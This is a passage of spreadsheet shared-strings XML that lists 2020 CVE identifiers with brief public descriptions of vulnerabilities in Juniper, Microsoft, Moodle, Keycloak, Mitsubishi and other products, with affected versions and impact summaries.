    <t>When configuring stateless firewall filters in Juniper Networks EX4600 and QFX 5000 Series devices using Virtual Extensible LAN protocol (VXLAN), the discard action will fail to discard traffic under certain conditions. Given a firewall filter configuration similar to: family ethernet-switching { filter L2-VLAN { term ALLOW { from { user-vlan-id 100; } then { accept; } } term NON-MATCH { then { discard; } } when there is only one term containing a 'user-vlan-id' match condition, and no other terms in the firewall filter except discard, the discard action for non-matching traffic will only discard traffic with the same VLAN ID specified under 'user-vlan-id'. Other traffic (e.g. VLAN ID 200) will not be discarded. This unexpected behavior can lead to unintended traffic passing through the interface where the firewall filter is applied. This issue only affects systems using VXLANs. This issue affects Juniper Networks Junos OS on QFX5K Series: 18.1 versions prior to 18.1R3-S7, except 18.1R3; 18.2 versions prior to 18.2R2-S7, 18.2R3-S1; 18.3 versions prior to 18.3R1-S5, 18.3R2-S4, 18.3R3; 18.4 versions prior to 18.4R1-S7, 18.4R2-S1, 18.4R3; 19.1 versions prior to 19.1R1-S5, 19.1R2; 19.2 versions prior to 19.2R1-S5, 19.2R2.</t>
  </si>
  <si>
    <t>CVE-2020-16850</t>
  </si>
  <si>
    <t>Mitsubishi MELSEC iQ-R Series PLCs with firmware 49 allow an unauthenticated attacker to halt the industrial process by sending a crafted packet over the network. This denial of service attack exposes Improper Input Validation. After halting, physical access to the PLC is required in order to restore production, and the device state is lost. This is related to R04CPU, RJ71GF11-T2, R04CPU, and RJ71GF11-T2.</t>
  </si>
  <si>
    <t>CVE-2020-16851</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the OneDrive for Windows Desktop application improperly handles symbolic links, aka 'OneDrive for Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16852, CVE-2020-16853.</t>
  </si>
  <si>
    <t>CVE-2020-16852</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the OneDrive for Windows Desktop application improperly handles symbolic links, aka 'OneDrive for Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16851, CVE-2020-16853.</t>
  </si>
  <si>
    <t>CVE-2020-16853</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the OneDrive for Windows Desktop application improperly handles symbolic links, aka 'OneDrive for Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16851, CVE-2020-16852.</t>
  </si>
  <si>
    <t>CVE-2020-16854</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0928, CVE-2020-1033, CVE-2020-1589, CVE-2020-1592.</t>
  </si>
  <si>
    <t>CVE-2020-16855</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when Microsoft Office software reads out of bound memory due to an uninitialized variable, which could disclose the contents of memory, aka 'Microsoft Office Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16856</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Visual Studio when it improperly handles objects in memory, aka 'Visual Studio Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16874.</t>
  </si>
  <si>
    <t>CVE-2020-16857</t>
  </si>
  <si>
    <t>CVE-2020-16858</t>
  </si>
  <si>
    <t>A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka 'Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability'. This CVE ID is unique from CVE-2020-16859, CVE-2020-16861, CVE-2020-16864, CVE-2020-16871, CVE-2020-16872, CVE-2020-16878.</t>
  </si>
  <si>
    <t>CVE-2020-16859</t>
  </si>
  <si>
    <t>A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka 'Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability'. This CVE ID is unique from CVE-2020-16858, CVE-2020-16861, CVE-2020-16864, CVE-2020-16871, CVE-2020-16872, CVE-2020-16878.</t>
  </si>
  <si>
    <t>CVE-2020-1686</t>
  </si>
  <si>
    <t>On Juniper Networks Junos OS devices, receipt of a malformed IPv6 packet may cause the system to crash and restart (vmcore). This issue can be trigged by a malformed IPv6 packet destined to the Routing Engine. An attacker can repeatedly send the offending packet resulting in an extended Denial of Service condition. Only IPv6 packets can trigger this issue. IPv4 packets cannot trigger this issue. This issue affects Juniper Networks Junos OS 18.4 versions prior to 18.4R2-S4, 18.4R3-S1; 19.1 versions prior to 19.1R2-S1, 19.1R3; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2. This issue does not affect Juniper Networks Junos OS prior to 18.4R1.</t>
  </si>
  <si>
    <t>CVE-2020-16860</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Dynamics 365 (on-premises) when the server fails to properly sanitize web requests to an affected Dynamics server, aka 'Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16862.</t>
  </si>
  <si>
    <t>CVE-2020-16861</t>
  </si>
  <si>
    <t>A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka 'Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability'. This CVE ID is unique from CVE-2020-16858, CVE-2020-16859, CVE-2020-16864, CVE-2020-16871, CVE-2020-16872, CVE-2020-16878.</t>
  </si>
  <si>
    <t>CVE-2020-16862</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Dynamics 365 (on-premises) when the server fails to properly sanitize web requests to an affected Dynamics server, aka 'Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16860.</t>
  </si>
  <si>
    <t>CVE-2020-16863</t>
  </si>
  <si>
    <t>A denial of service vulnerability exists in Windows Remote Desktop Service when an attacker connects to the target system using RDP and sends specially crafted requests, aka 'Windows Remote Desktop Service Denial of Service Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16864</t>
  </si>
  <si>
    <t>A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka 'Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability'. This CVE ID is unique from CVE-2020-16858, CVE-2020-16859, CVE-2020-16861, CVE-2020-16871, CVE-2020-16872, CVE-2020-16878.</t>
  </si>
  <si>
    <t>CVE-2020-1687</t>
  </si>
  <si>
    <t>On Juniper Networks EX4300-MP Series, EX4600 Series and QFX5K Series deployed in (Ethernet VPN) EVPN-(Virtual Extensible LAN) VXLAN configuration, receipt of a stream of specific VXLAN encapsulated layer 2 frames can cause high CPU load, which could lead to network protocol operation issue and traffic interruption. This issue affects devices that are configured as a Layer 2 or Layer 3 gateway of an EVPN-VXLAN deployment. The offending layer 2 frames that cause the issue originate from a different access switch that get encapsulated within the same EVPN-VXLAN domain. This issue affects Juniper Networks Junos OS on EX4300-MP Series, EX4600 Series and QFX5K Series: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R2-S2, 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R2-S1, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2.</t>
  </si>
  <si>
    <t>CVE-2020-16871</t>
  </si>
  <si>
    <t>A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka 'Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability'. This CVE ID is unique from CVE-2020-16858, CVE-2020-16859, CVE-2020-16861, CVE-2020-16864, CVE-2020-16872, CVE-2020-16878.</t>
  </si>
  <si>
    <t>CVE-2020-16872</t>
  </si>
  <si>
    <t>A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka 'Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability'. This CVE ID is unique from CVE-2020-16858, CVE-2020-16859, CVE-2020-16861, CVE-2020-16864, CVE-2020-16871, CVE-2020-16878.</t>
  </si>
  <si>
    <t>CVE-2020-16873</t>
  </si>
  <si>
    <t>A spoofing vulnerability manifests in Microsoft Xamarin.Forms due to the default settings on Android WebView version prior to 83.0.4103.106, aka 'Xamarin.Forms Spoofing Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16874</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Visual Studio when it improperly handles objects in memory, aka 'Visual Studio Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16856.</t>
  </si>
  <si>
    <t>CVE-2020-16875</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Exchange server due to improper validation of cmdlet arguments.An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the System user, aka 'Microsoft Exchange Server Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16876</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Application Compatibility Client Library improperly handles registry operations, aka 'Windows Application Compatibility Client Library Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16920.</t>
  </si>
  <si>
    <t>CVE-2020-16877</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Microsoft Windows improperly handles reparse points, aka 'Windows Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16878</t>
  </si>
  <si>
    <t>A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka 'Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability'. This CVE ID is unique from CVE-2020-16858, CVE-2020-16859, CVE-2020-16861, CVE-2020-16864, CVE-2020-16871, CVE-2020-16872.</t>
  </si>
  <si>
    <t>CVE-2020-16879</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when a Windows Projected Filesystem improperly handles file redirections, aka 'Projected Filesystem Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-1688</t>
  </si>
  <si>
    <t>On Juniper Networks SRX Series and NFX Series, a local authenticated user with access to the shell may obtain the Web API service private key that is used to provide encrypted communication between the Juniper device and the authenticator services. Exploitation of this vulnerability may allow an attacker to decrypt the communications between the Juniper device and the authenticator service. This Web API service is used for authentication services such as the Juniper Identity Management Service, used to obtain user identity for Integrated User Firewall feature, or the integrated ClearPass authentication and enforcement feature. This issue affects Juniper Networks Junos OS on Networks SRX Series and NFX Series: 12.3X48 versions prior to 12.3X48-D105; 15.1X49 versions prior to 15.1X49-D190; 16.1 versions prior to 16.1R7-S8; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R2-S11, 17.4R3; 18.1 versions prior to 18.1R3-S7; 18.2 versions prior to 18.2R3; 18.3 versions prior to 18.3R2-S4, 18.3R3; 18.4 versions prior to 18.4R1-S7, 18.4R2; 19.1 versions prior to 19.1R2; 19.2 versions prior to 19.2R1-S4, 19.2R2.</t>
  </si>
  <si>
    <t>CVE-2020-16881</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Visual Studio Code when a user is tricked into opening a malicious 'package.json' file, aka 'Visual Studio JSON Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16884</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that the IEToEdge Browser Helper Object (BHO) plugin on Internet Explorer handles objects in memory, aka 'Internet Explorer Browser Helper Object (BHO) Memory Corruption Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16885</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Storage VSP Driver improperly handles file operations, aka 'Windows Storage VSP Driver Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16886</t>
  </si>
  <si>
    <t>A security feature bypass vulnerability exists in the PowerShellGet V2 module, aka 'PowerShellGet Module WDAC Security Feature Bypass Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16887</t>
  </si>
  <si>
    <t>CVE-2020-16889</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows KernelStream improperly handles objects in memory, aka 'Windows KernelStream Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-1689</t>
  </si>
  <si>
    <t>On Juniper Networks EX4300-MP Series, EX4600 Series and QFX5K Series deployed in a Virtual Chassis configuration, receipt of a stream of specific layer 2 frames can cause high CPU load, which could lead to traffic interruption. This issue does not occur when the device is deployed in Stand Alone configuration. The offending layer 2 frame packets can originate only from within the broadcast domain where the device is connected. This issue affects Juniper Networks Junos OS on EX4300-MP Series, EX4600 Series and QFX5K Series: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2.</t>
  </si>
  <si>
    <t>CVE-2020-16890</t>
  </si>
  <si>
    <t>CVE-2020-16891</t>
  </si>
  <si>
    <t>CVE-2020-16892</t>
  </si>
  <si>
    <t>CVE-2020-16894</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when Windows Network Address Translation (NAT) fails to properly handle UDP traffic, aka 'Windows NAT Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16895</t>
  </si>
  <si>
    <t>CVE-2020-16896</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests, aka 'Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16897</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when NetBIOS over TCP (NBT) Extensions (NetBT) improperly handle objects in memory, aka 'NetBT Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16898</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets, aka 'Windows TCP/IP Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16899</t>
  </si>
  <si>
    <t>A denial of service vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets, aka 'Windows TCP/IP Denial of Service Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-1690</t>
  </si>
  <si>
    <t>An improper authorization flaw was discovered in openstack-selinux's applied policy where it does not prevent a non-root user in a container from privilege escalation. A non-root attacker in one or more Red Hat OpenStack (RHOSP) containers could send messages to the dbus. With access to the dbus, the attacker could start or stop services, possibly causing a denial of service. Versions before openstack-selinux 0.8.24 are affected.</t>
  </si>
  <si>
    <t>CVE-2020-16900</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Event System improperly handles objects in memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Event System Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16901</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.To exploit this vulnerability, an authenticated attacker could run a specially crafted application, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-16938.</t>
  </si>
  <si>
    <t>CVE-2020-16902</t>
  </si>
  <si>
    <t>CVE-2020-16904</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way Azure Functions validate access keys.An unauthenticated attacker who successfully exploited this vulnerability could invoke an HTTP Function without proper authorization.This security update addresses the vulnerability by correctly validating access keys used to access HTTP Functions., aka 'Azure Functions Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16905</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka 'Windows Error Reporting Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16909.</t>
  </si>
  <si>
    <t>CVE-2020-16907</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16913.</t>
  </si>
  <si>
    <t>CVE-2020-16908</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Windows Setup in the way it handles directories.A locally authenticated attacker could run arbitrary code with elevated system privileges, aka 'Windows Setup Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16909</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka 'Windows Error Reporting Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16905.</t>
  </si>
  <si>
    <t>CVE-2020-1691</t>
  </si>
  <si>
    <t>In Moodle 3.8, messages required extra sanitizing before updating the conversation overview, to prevent the risk of stored cross-site scripting.</t>
  </si>
  <si>
    <t>CVE-2020-16910</t>
  </si>
  <si>
    <t>A security feature bypass vulnerability exists when Microsoft Windows fails to handle file creation permissions, which could allow an attacker to create files in a protected Unified Extensible Firmware Interface (UEFI) location.To exploit this vulnerability, an attacker could run a specially crafted application to bypass Unified Extensible Firmware Interface (UEFI) variable security in Windows.The security update addresses the vulnerability by correcting security feature behavior to enforce permissions., aka 'Windows Security Feature Bypass Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16911</t>
  </si>
  <si>
    <t>CVE-2020-16912</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Backup Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976.</t>
  </si>
  <si>
    <t>CVE-2020-16913</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16907.</t>
  </si>
  <si>
    <t>CVE-2020-16914</t>
  </si>
  <si>
    <t>CVE-2020-16915</t>
  </si>
  <si>
    <t>CVE-2020-16916</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Windows improperly handles COM object creation, aka 'Windows COM Server Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16935.</t>
  </si>
  <si>
    <t>CVE-2020-16918</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when the Base3D rendering engine improperly handles memory.An attacker who successfully exploited the vulnerability would gain execution on a victim system.The security update addresses the vulnerability by correcting how the Base3D rendering engine handles memory., aka 'Base3D Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-17003.</t>
  </si>
  <si>
    <t>CVE-2020-16919</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows Enterprise App Management Service improperly handles certain file operations, aka 'Windows Enterprise App Management Service Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-1692</t>
  </si>
  <si>
    <t>Moodle before version 3.7.2 is vulnerable to information exposure of service tokens for users enrolled in the same course.</t>
  </si>
  <si>
    <t>CVE-2020-16920</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Application Compatibility Client Library improperly handles registry operations, aka 'Windows Application Compatibility Client Library Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16876.</t>
  </si>
  <si>
    <t>CVE-2020-16921</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists in Text Services Framework when it fails to properly handle objects in memory, aka 'Windows Text Services Framework Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16922</t>
  </si>
  <si>
    <t>CVE-2020-16923</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory, aka 'Microsoft Graphics Components Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1167.</t>
  </si>
  <si>
    <t>CVE-2020-16924</t>
  </si>
  <si>
    <t>CVE-2020-16927</t>
  </si>
  <si>
    <t>CVE-2020-16928</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka 'Microsoft Office Click-to-Run Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16934, CVE-2020-16955.</t>
  </si>
  <si>
    <t>CVE-2020-16929</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka 'Microsoft Excel Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16930, CVE-2020-16931, CVE-2020-16932.</t>
  </si>
  <si>
    <t>CVE-2020-1693</t>
  </si>
  <si>
    <t>A flaw was found in Spacewalk up to version 2.9 where it was vulnerable to XML internal entity attacks via the /rpc/api endpoint. An unauthenticated remote attacker could use this flaw to retrieve the content of certain files and trigger a denial of service, or in certain circumstances, execute arbitrary code on the Spacewalk server.</t>
  </si>
  <si>
    <t>CVE-2020-16930</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka 'Microsoft Excel Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16929, CVE-2020-16931, CVE-2020-16932.</t>
  </si>
  <si>
    <t>CVE-2020-16931</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka 'Microsoft Excel Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16929, CVE-2020-16930, CVE-2020-16932.</t>
  </si>
  <si>
    <t>CVE-2020-16932</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka 'Microsoft Excel Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16929, CVE-2020-16930, CVE-2020-16931.</t>
  </si>
  <si>
    <t>CVE-2020-16933</t>
  </si>
  <si>
    <t>A security feature bypass vulnerability exists in Microsoft Word software when it fails to properly handle .LNK files, aka 'Microsoft Word Security Feature Bypass Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16934</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka 'Microsoft Office Click-to-Run Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16928, CVE-2020-16955.</t>
  </si>
  <si>
    <t>CVE-2020-16935</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Windows improperly handles COM object creation, aka 'Windows COM Server Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16916.</t>
  </si>
  <si>
    <t>CVE-2020-16936</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Backup Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16912, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976.</t>
  </si>
  <si>
    <t>CVE-2020-16937</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the .NET Framework improperly handles objects in memory, aka '.NET Framework Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16938</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-16901.</t>
  </si>
  <si>
    <t>CVE-2020-16939</t>
  </si>
  <si>
    <t>CVE-2020-1694</t>
  </si>
  <si>
    <t>A flaw was found in all versions of Keycloak before 10.0.0, where the NodeJS adapter did not support the verify-token-audience. This flaw results in some users having access to sensitive information outside of their permissions.</t>
  </si>
  <si>
    <t>CVE-2020-16940</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles junction points, aka 'Windows - User Profile Service Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16941</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when Microsoft SharePoint Server improperly discloses its folder structure when rendering specific web pages, aka 'Microsoft SharePoint Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-16942, CVE-2020-16948, CVE-2020-16950, CVE-2020-16953.</t>
  </si>
  <si>
    <t>CVE-2020-16942</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when Microsoft SharePoint Server improperly discloses its folder structure when rendering specific web pages, aka 'Microsoft SharePoint Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-16941, CVE-2020-16948, CVE-2020-16950, CVE-2020-16953.</t>
  </si>
  <si>
    <t>CVE-2020-16943</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Microsoft Dynamics 365 Commerce, aka 'Dynamics 365 Commerce Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16944</t>
  </si>
  <si>
    <t>CVE-2020-16945</t>
  </si>
  <si>
    <t>A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-16946.</t>
  </si>
  <si>
    <t>CVE-2020-16946</t>
  </si>
  <si>
    <t>A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-16945.</t>
  </si>
  <si>
    <t>CVE-2020-16947</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Outlook software when the software fails to properly handle objects in memory, aka 'Microsoft Outlook Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-16948</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when Microsoft SharePoint Server fails to properly handle objects in memory, aka 'Microsoft SharePoint Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-16941, CVE-2020-16942, CVE-2020-16950, CVE-2020-16953.</t>
  </si>
  <si>
    <t>CVE-2020-16949</t>
  </si>
  <si>
    <t>A denial of service vulnerability exists in Microsoft Outlook software when the software fails to properly handle objects in memory, aka 'Microsoft Outlook Denial of Service Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-1695</t>
  </si>
  <si>
    <t>A flaw was found in all resteasy 3.x.x versions prior to 3.12.0.Final and all resteasy 4.x.x versions prior to 4.6.0.Final, where an improper input validation results in returning an illegal header that integrates into the server's response. This flaw may result in an injection, which leads to unexpected behavior when the HTTP response is constructed.</t>
  </si>
  <si>
    <t>CVE-2020-16950</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when Microsoft SharePoint Server fails to properly handle objects in memory, aka 'Microsoft SharePoint Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-16941, CVE-2020-16942, CVE-2020-16948, CVE-2020-16953.</t>
  </si>
  <si>
    <t>CVE-2020-16951</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16952.</t>
  </si>
  <si>
    <t>CVE-2020-16952</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16951.</t>
  </si>
  <si>
    <t>CVE-2020-16953</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when Microsoft SharePoint Server fails to properly handle objects in memory, aka 'Microsoft SharePoint Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-16941, CVE-2020-16942, CVE-2020-16948, CVE-2020-16950.</t>
  </si>
  <si>
    <t>CVE-2020-16954</t>
  </si>
  <si>
    <t>CVE-2020-16955</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka 'Microsoft Office Click-to-Run Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16928, CVE-2020-16934.</t>
  </si>
  <si>
    <t>CVE-2020-16956</t>
  </si>
  <si>
    <t>A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka 'Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability'. This CVE ID is unique from CVE-2020-16978.</t>
  </si>
  <si>
    <t>CVE-2020-16957</t>
  </si>
  <si>
    <t>CVE-2020-16958</t>
  </si>
